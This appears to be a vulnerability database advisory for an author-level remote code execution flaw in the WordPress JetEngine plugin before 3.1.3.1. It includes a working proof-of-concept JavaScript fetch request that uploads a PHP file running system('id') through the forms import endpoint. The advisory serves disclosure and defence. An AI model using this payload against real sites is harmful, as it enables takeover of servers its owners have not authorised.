JetEngine < 3.1.3.1 - Author+ Remote Code Execution

2023-03-2000:00:00

Luke Symons

202

jetengine

remote code execution

form_file upload

security vulnerability

EPSS

0.002

Percentile

58.8%

JSON

The plugin includes uploaded files without adequately ensuring that they are not executable, leading to a remote code execution vulnerability.

fetch("/wp-admin/admin.php?action=jet_engine_forms_import", {
  "headers": {
    "accept": "text/html",
    "content-type": "multipart/form-data; boundary=----WebKitFormBoundary5hcKRhxO2OVXJm3s"
  },
  "body": "------WebKitFormBoundary5hcKRhxO2OVXJm3s\r\nContent-Disposition: form-data; name=\"form_file\"; filename=\"poc.php\"\r\nContent-Type: application/json\r\n\r\n<?php die(system('id'));\r\n------WebKitFormBoundary5hcKRhxO2OVXJm3s--\r\n",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text()).then((data) => console.log(data));

EPSS

0.002

Percentile

58.8%

JSON

Related for WPEX-ID:2A81B6B1-2339-4889-9C28-1AF133DF8B65